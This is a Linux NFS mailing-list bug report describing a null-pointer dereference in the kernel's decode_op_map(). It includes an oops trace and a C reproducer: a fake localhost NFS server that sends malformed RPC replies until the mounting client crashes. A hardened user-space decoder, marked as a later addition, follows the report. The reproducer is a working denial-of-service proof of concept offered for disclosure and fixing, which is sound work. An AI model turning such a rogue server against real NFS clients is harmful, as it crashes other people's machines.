From: rtm@csail.mit.edu
Reply-To: rtm@csail.mit.edu
To: Trond Myklebust, Anna Schumaker
Cc: linux-nfs@vger.kernel.org
X-Mailing-List: linux-nfs@vger.kernel.org
Subject: another NFS client RPC bug
Date: Thu, 04 Nov 2021 17:10:01 -0400
Message-ID: <8046.1636060201@crash.local>

In decode_op_map() in fs/nfs/nfs4xdr.c:

    uint32_t bitmap_words;
    ...;
    bitmap_words = be32_to_cpup(p++);
    if (bitmap_words > NFS4_OP_MAP_NUM_WORDS)
        return -EIO;
    ...;
    p = xdr_inline_decode(xdr, 4 * bitmap_words);
    for (i = 0; i < bitmap_words; i++)
        op_map->u.words[i] = be32_to_cpup(p++);

The return value from xdr_inline_decode() isn't checked, so there can be a null-pointer dereference if there aren't enough bytes left in the RPC message.

I've attached a program that produces the bug on my 5.15 machine:

    # cc nfs_2.c
    # ./a.out
    mount:mount.nfs: timeout set for Thu Nov  4 21:10:28 2021
    mount.nfs: trying text-based options 'vers=4.2,addr=127.0.0.1,clientaddr=127.0.0.1'
    [   29.133142] random: fast init done
    accept returned 4
    proc 0
    proc 1
    [   19.298637] Unable to handle kernel access to user memory without uaccess routines at virtual address 0000000000000000
    [   19.316686] Oops [#1]
    [   19.322023] Modules linked in:
    [   19.329310] CPU: 0 PID: 61 Comm: mount.nfs Not tainted 5.15.0-rc7-dirty #15
    [   19.341196] Hardware name: ucbbar,riscvemu-bare (DT)
    [   19.350236] epc : decode_op_map+0x78/0xba
    [   19.357992]  ra : decode_op_map+0x62/0xba
    [   19.365744] epc : ffffffff8022d93c ra : ffffffff8022d926 sp : ffffffd0005736e0
    ...
    [   19.504650] status: 0000000200000121 badaddr: 0000000000000000 cause: 000000000000000d
    [   19.518135] [] decode_op_map+0x78/0xba
    [   19.528276] [] nfs4_xdr_dec_exchange_id+0x1a6/0x57e
    [   19.540304] [] rpcauth_unwrap_resp_decode+0x12/0x1a
    [   19.552386] [] rpcauth_unwrap_resp+0x12/0x1a
    [   19.563960] [] call_decode+0x112/0x176
    [   19.574123] [] __rpc_execute+0x76/0x216
    [   19.584286] [] rpc_execute+0x58/0x7e
    [   19.594443] [] rpc_run_task+0x12c/0x16c
    [   19.604541] [] nfs4_run_exchange_id+0x1d8/0x262
    [   19.616149] [] _nfs4_proc_exchange_id+0x24/0x2ba
    [   19.627761] [] nfs4_proc_exchange_id+0x30/0x50
    [   19.639397] [] nfs41_discover_server_trunking+0x1c/0xa8
    [   19.651468] [] nfs4_discover_server_trunking+0x7c/0x1e8
    [   19.663549] [] nfs4_init_client+0x92/0xf6
    [   19.673663] [] nfs_get_client+0x36a/0x394
    [   19.683817] [] nfs4_set_client+0xd6/0x13e
    [   19.693935] [] nfs4_create_server+0xb8/0x208
    [   19.705529] [] nfs4_try_get_tree+0x16/0x4c
    [   19.717147] [] nfs_get_tree+0x34a/0x3ac
    [   19.727243] [] vfs_get_tree+0x18/0x88
    [   19.737351] [] path_mount+0x4f4/0x77a
    [   19.747521] [] do_mount+0x4c/0x7e
    [   19.757264] [] sys_mount+0xca/0x14e
    [   19.767418] [] ret_from_syscall+0x0/0x2

[Attachment: nfs_2.c, decoded from the base64 MIME part of the message]

/*
 * Reproducer: a fake NFS server on 127.0.0.1:2049 that answers every RPC
 * call with a 128-byte reply filled with 0xff bytes, XOR-mutated by the
 * aaa[] table, while a child process mounts from it.
 */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <netinet/in.h>
#include <sys/wait.h>
#include <sys/resource.h>

/* XOR mask applied 8 bytes at a time across successive replies. */
unsigned long long aaa[] = {
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0xc4ffffff00000000ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0xffffffffd5ffffffull,
0x0ull,
0x0ull,
0xfbfffffffeffffffull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
0x0ull,
};
int iii = 0;

/* Read exactly n bytes, or return -1 on EOF/error. */
int readn(int fd, char *buf, int n) {
  int orig = n;
  while(n > 0){
    int cc = read(fd, buf, n);
    if(cc <= 0) { perror("read"); return -1; }
    n -= cc;
    buf += cc;
  }
  return orig;
}

int
main(){
  struct rlimit r;
  r.rlim_cur = r.rlim_max = 0;
  setrlimit(RLIMIT_CORE, &r);

  int s = socket(AF_INET, SOCK_STREAM, 0);
  struct sockaddr_in sin;
  memset(&sin, 0, sizeof(sin));
  sin.sin_family = AF_INET;
  sin.sin_port = htons(2049);
  if(bind(s, (struct sockaddr *)&sin, sizeof(sin)) < 0){
    perror("bind"); exit(1);
  }
  listen(s, 10);
  sync(); sleep(1); sleep(1); sleep(1);

  /* Client side: mount from the fake server and poke at the mount. */
  if(fork() == 0){
    if(system("echo -n mount: ; mount -v -t nfs 127.0.0.1:/tmp /mnt") == 0){
      system("echo -n ls: ; ls -l /mnt/. /mnt/z");
      system("echo -n echo: ; echo hi > /mnt/x");
      system("echo -n umount: ; umount /mnt");
    }
    exit(0);
  }

  /* Server side: accept one connection and answer each call. */
  if(fork() == 0){
#define NAA 64
    unsigned long long aa[NAA];
    for(int i = 0; i < NAA; i++) aa[i] = aaa[iii++];
    int ii = 0;

    socklen_t sinlen = sizeof(sin);
    int s1 = accept(s, (struct sockaddr *) &sin, &sinlen);
    printf("accept returned %d\n", s1);
    if(s1 < 0) { perror("accept"); exit(1); }
    close(s);
  
    while(1){
      /* RPC record marking: 4-byte length with the high bit as "last fragment". */
      unsigned int ilen;
      if(readn(s1, (char*)&ilen, 4) < 0) break;
      ilen = ntohl(ilen);
      ilen &= 0x7fffffff;
      char ibuf[1024];
      if(readn(s1, (char*)ibuf, ilen) < 0) break;
      int xid = *(int*)(ibuf+0);
      int proc = ntohl(*(int*)(ibuf+20));
      printf("proc %d\n", proc);
      
      char obuf[128];
      int olen = sizeof(obuf);
      int dummy = htonl(olen | 0x80000000);
      write(s1, &dummy, 4);
      memset(obuf, 0xff, sizeof(obuf));
      for(int i = 0; i+8 <= sizeof(obuf) && ii < NAA; i += 8)
        *(unsigned long long *)(obuf + i) ^= aa[ii++];
      /* Well-formed RPC reply header; everything after it is the 0xff/XOR payload. */
      *(int*)(obuf+0) = xid;
      *(int*)(obuf+4) = htonl(1); // REPLY
      *(int*)(obuf+8) = htonl(0); // MSG_ACCEPTED
      *(int*)(obuf+12) = htonl(0); // opaque_auth flavor = AUTH_NULL
      *(int*)(obuf+16) = htonl(0); // opaque_auth length
      *(int*)(obuf+20) = htonl(0); // SUCCESS
      if(write(s1, obuf, olen)<=0) perror("write");
    }
    exit(1);
  }
  close(s);
  sleep(7);
}
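The missing check the report describes, modelled in user space as an added example (this is not kernel code and not part of the original message). xdr_inline_decode() is reduced to a bounds check over a byte buffer that returns NULL when fewer bytes remain than requested, which is the behaviour the kernel's version has and the reported decode_op_map() failed to check; NFS4_OP_MAP_NUM_WORDS is assumed to be 4 and the op-map structure is simplified to a plain word array. The hardened decoder returns -EIO for a truncated reply instead of dereferencing NULL, which is the kind of defensive check any XDR decoder facing an untrusted server needs on every inline decode.

```c
#include <errno.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed value for this model; the kernel derives it from the NFSv4 op count. */
#define NFS4_OP_MAP_NUM_WORDS 4

struct nfs4_op_map {
	uint32_t words[NFS4_OP_MAP_NUM_WORDS];
};

/* Minimal receive stream: current decode position and end of the RPC message. */
struct xdr_stream {
	const uint8_t *p;
	const uint8_t *end;
};

/* Model of xdr_inline_decode(): pointer to nbytes of data, or NULL if the message is short. */
static const uint8_t *xdr_inline_decode(struct xdr_stream *xdr, size_t nbytes)
{
	const uint8_t *ret = xdr->p;

	if ((size_t)(xdr->end - xdr->p) < nbytes)
		return NULL;
	xdr->p += nbytes;
	return ret;
}

static uint32_t be32_to_cpup(const uint8_t *p)
{
	return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
	       ((uint32_t)p[2] << 8) | (uint32_t)p[3];
}

/*
 * Hardened decoder: every xdr_inline_decode() result is checked before it is
 * dereferenced, so a truncated or hostile reply yields -EIO, not an oops.
 */
int decode_op_map(struct xdr_stream *xdr, struct nfs4_op_map *op_map)
{
	const uint8_t *p;
	uint32_t bitmap_words, i;

	memset(op_map, 0, sizeof(*op_map));

	p = xdr_inline_decode(xdr, 4);
	if (!p)
		return -EIO;	/* no room for the word count itself */
	bitmap_words = be32_to_cpup(p);
	if (bitmap_words > NFS4_OP_MAP_NUM_WORDS)
		return -EIO;	/* the check the reported code already has */

	p = xdr_inline_decode(xdr, 4 * bitmap_words);
	if (!p)
		return -EIO;	/* the check the reported code is missing */
	for (i = 0; i < bitmap_words; i++)
		op_map->words[i] = be32_to_cpup(p + 4 * i);
	return 0;
}

/* Convenience wrapper: decode an op map from a raw byte buffer. */
int decode_op_map_bytes(const uint8_t *msg, size_t len, struct nfs4_op_map *op_map)
{
	struct xdr_stream xdr = { msg, msg + len };

	return decode_op_map(&xdr, op_map);
}

int main(void)
{
	/* Constructed replies: a well-formed map, and one whose bitmap is cut short. */
	const uint8_t good[] = { 0, 0, 0, 2,  0, 0, 0, 1,  0x80, 0, 0, 0 };
	const uint8_t truncated[] = { 0, 0, 0, 2,  0, 0, 0, 1 };
	struct nfs4_op_map map;
	int rc;

	rc = decode_op_map_bytes(good, sizeof good, &map);
	printf("good: rc=%d words[0]=%#x words[1]=%#x\n", rc, map.words[0], map.words[1]);
	rc = decode_op_map_bytes(truncated, sizeof truncated, &map);
	printf("truncated: rc=%d (-EIO is %d)\n", rc, -EIO);
	return 0;
}
```

The wrapper decode_op_map_bytes() is what a unit test for the real decoder would look like: feed it the exact byte sequences a misbehaving server could send (word count with no bitmap, a bitmap shorter than its count, a count above the limit) and require -EIO from each.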